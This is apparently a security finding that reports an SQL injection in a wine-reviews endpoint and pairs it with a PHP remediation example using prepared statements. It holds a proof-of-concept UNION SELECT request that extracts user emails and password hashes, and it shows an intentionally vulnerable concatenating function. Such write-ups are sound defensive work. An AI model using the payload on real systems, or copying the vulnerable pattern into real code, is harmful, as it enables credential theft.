Vuln ID: TP-004
Title: SQL Injection - Wine Reviews
Severity: critical
Type: SQLi
HTTP Method: GET
URL: /wines/:id/reviews
Parameter: id
Filename: -
Code Location: backend/api/models/Review.php -> getByWineId() line 16

Description

The wine ID taken from the :id path parameter is concatenated directly into the SQL query in getByWineId() (backend/api/models/Review.php, line 16) when fetching reviews, so the request controls the structure of the query rather than only a value in it.

Proof of Concept

GET /wines/0 UNION SELECT 1,email,password_hash,name,5,6 FROM users--/reviews

Remediation

Use a parameterized (prepared) query in getByWineId() so the wine ID is bound as a value and never spliced into the SQL text.
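The following is an added example, not code from the project: the finding names backend/api/models/Review.php -> getByWineId() but does not show its body, so the shape of the vulnerable concatenation, the table name "reviews", its columns, and the in-memory SQLite connection used for the demo are all assumptions. It shows the defect the finding describes next to the remediated form, with an integer check on the route parameter added as defense in depth.

```php
<?php
// Added example (not the project's code). The page names
// backend/api/models/Review.php -> getByWineId() but shows no body, so the
// table "reviews", its columns, and the SQLite demo connection are assumptions.

// Assumed shape of the defect the finding describes: the :id path parameter is
// concatenated into the SQL text, so the request controls the query structure.
function getByWineIdVulnerable(PDO $db, $id): array
{
    $sql = "SELECT id, wine_id, author, rating FROM reviews WHERE wine_id = " . $id;
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Remediated version: the id is validated and then bound as a typed parameter,
// so it is only ever compared as a value and never parsed as SQL.
function getByWineId(PDO $db, $id): array
{
    // Defense in depth: a wine id from the route must be a positive integer.
    // Anything else is rejected before a query is built at all.
    if (filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]) === false) {
        throw new InvalidArgumentException('wine id must be a positive integer');
    }

    $stmt = $db->prepare(
        'SELECT id, wine_id, author, rating FROM reviews WHERE wine_id = :wine_id'
    );
    $stmt->bindValue(':wine_id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Offline demo on an in-memory SQLite database with constructed sample rows.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE reviews (id INTEGER PRIMARY KEY, wine_id INTEGER, author TEXT, rating INTEGER)');
$db->exec("INSERT INTO reviews (wine_id, author, rating) VALUES (7, 'alice', 4), (7, 'bob', 5), (8, 'carol', 3)");

print_r(getByWineId($db, '7'));          // the two constructed rows for wine 7

try {
    getByWineId($db, '0 OR 1=1');        // fails validation; no SQL is executed
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

On drivers that emulate prepared statements by default (pdo_mysql, for example), also set PDO::ATTR_EMULATE_PREPARES to false so the value is sent separately from the statement text rather than quoted client-side; the binding above is safe either way, but native prepares remove the quoting step entirely. The integer check is not a substitute for the parameter binding, it only ensures a malformed id is rejected with a clear error before the model touches the database.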